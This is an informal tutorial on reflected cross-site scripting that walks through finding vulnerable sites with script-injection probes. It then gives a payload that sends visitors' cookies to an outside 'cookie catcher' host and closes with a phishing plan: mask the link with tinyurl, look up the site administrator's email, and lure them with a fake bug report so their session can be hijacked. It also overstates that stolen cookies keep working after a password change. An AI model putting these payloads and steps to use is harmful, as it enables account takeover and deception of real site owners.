What is XSS? XSS is stands for Cross site Scripting. Don't confuse this with CSS(Cascading Style sheet). It is one of the Top Web Application Vulnerability. This vulnerability allows the attacker to insert client side scripts(especially Javascript) . Using this vulnerability an attacker can inject malicious codes, leads to malware attack, phishing and session hijacking.
Types of XSS
There are actually three types of Cross-Site Scripting, commonly named as:- Persistent X
- Non-persistent XSS
- DOM-Based XSS
S0 in diz tutorial i will be concentrating on Non-Persistent method :D
Non-persistent XSS
The most common applying of this kind of vulnerability is in Search engines in website: the attacker writes some arbitrary HTML code in the search textbox and, if the website is vulnerable, the result page will return the result of these HTML entities.
Finding a XSS Vulnerable sites
First of all,we need to find sites which are vulnerable to XSS attack.There are many such sites.To find XSS vulnerable sites add a code after the link.Add below given codes after the site link to find whether the site is vulnerable or not :
Code:
"><script>alertundefineddocument.cookie)</script>
Code:
'><script>alertundefineddocument.cookie)</script>
Code:
"><script>alertundefined"Test")</script>
Code:
'><script>alertundefined"Test")</script>
Or a new one which i found out myself which you can inject HTML:
Code:
"><body bgcolor="FF0000"></body>
Code:
<body onload=alert('test1')>
After adding these codes after the link if your site is http://www.example.com the link to test it would be: http://www.example.com/index.php?id="><script>alert(document.cookie)</script> and now press Enter.
Then if we see a javascript is pop up Or you saw the page's background go black Or a page of google opens in that site,it means we have come to a XSS vulnerable site FOr example see d image below ~_~
- After finding the site check for its search box , it must be like this search.php and now you have to check whether this search.php is vulnerable or not.
- To check this add this simple code in the search box and click the search button.
Code:
<script>alert(document.cookie)</script>
- After searching this code if a box popup it means this search.php is vulnerable to Non-Persistent XSS attack.
- Now after confirming the vulnerability add the below code in the url of this search.php page.
Code:
"><script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>
- Now we have to shrink the link of whole page for this use tinyurl or any other such service.
- Now try to find a site administrator's E-mail,for this you may use whois lookup table or any online service which gives you the detail of the site's owner
- After getting the email id send him a fake email from any online fake mailer or through your fake id.
- In the body of the email just tell something fake like: Hey i found a huge bug in your website! and give him the shrinked link of the search.php in which you have also added the code.
- Tinyurl will mask the link and don't let it to go to spam
- Once he clicked on that link you will see his cookies in your cookies.html and he will just be redirected to the link in your cookies catcher.
- No matter what he does and changes his password you can still login as him.